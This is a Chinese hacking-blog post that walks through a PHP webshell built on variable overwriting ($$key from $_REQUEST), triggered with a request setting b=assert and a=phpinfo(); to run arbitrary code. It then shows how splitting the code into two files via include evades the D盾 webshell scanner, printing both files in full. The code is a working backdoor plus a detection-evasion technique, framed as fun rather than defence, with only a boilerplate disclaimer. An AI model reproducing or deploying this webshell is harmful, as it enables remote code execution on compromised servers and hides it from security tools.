过D盾的马马

  • 内容
  • 相关

简介

发现最近过waf很好玩,异想天开的写代码就好了(当然要写的对),然后自己也来试一试,想到了利用变量覆盖来绕过~

开始玩耍吧

首先,我们先来了解一下变量覆盖漏洞,这里我之前写过一个文章,可以转到此处看(https://www.zybuluo.com/1kbfree/note/1135811),然后这里运用的就是$$变量覆盖方法,代码如下

<?php 
 
$a = '小狗狗你好啊'; 
$b = '小盾盾你好啊'; 
// 你妹 
 
foreach ($_REQUEST as $key => $value) { 
 $$key = $value; 
} 

$b( $a ); 


然后访问并且带上参数?b=assert&a=phpinfo();就可以执行phpinfo函数,如下

1.png

然后放到D盾处骚(我日,输入法自己打的)一下

2.png

此时心情 -> 你妹,擦。ooxx$@%awdaw..(省略一万字)

这都给拦截了,好吧,然后就试了一下然后发现很多办法都没成功,虽然级别只是1,但是依旧不是最完美的,然后就在i春秋看到一个表哥利用分离方法来绕过了,很骚气,原文链接:https://bbs.ichunqiu.com/thread-25644-1-1.html。。。 然后我也试一下,发现是可以绕过的,如下

3.png

然后再放D盾扫下

4.png

嘻嘻,这里D盾已经没扫到了(谢谢盾哥配合啊) 你妹

最后d_dun.php代码是

<?php

$a = '小狗狗你好啊';
$b = '小盾盾你好啊';
// 你妹

foreach ($_REQUEST as $key => $value) {
	$$key = $value;
}

d_dunn.php代码是

<?php

include 'd_dun.php';
$b( $a );

本文标签:

版权声明:若无特殊注明,本文皆为《only_free》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:过D盾的马马 - https://www.0dayhack.com/post-862.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论

2条评论
  1. avatar

    夏侯惇 Lv.1 Chrome 69.0.3497.100 Chrome 69.0.3497.100 Mac OS X 10.13.6 Mac OS X 10.13.6 回复

    你师叔我来睡沙发

    陕西省西安市 联通

    1. 顺水啦啦啦 Lv.1 回复

      回复了夏侯惇:你是宝鸡的吗?

      陕西省西安市 电信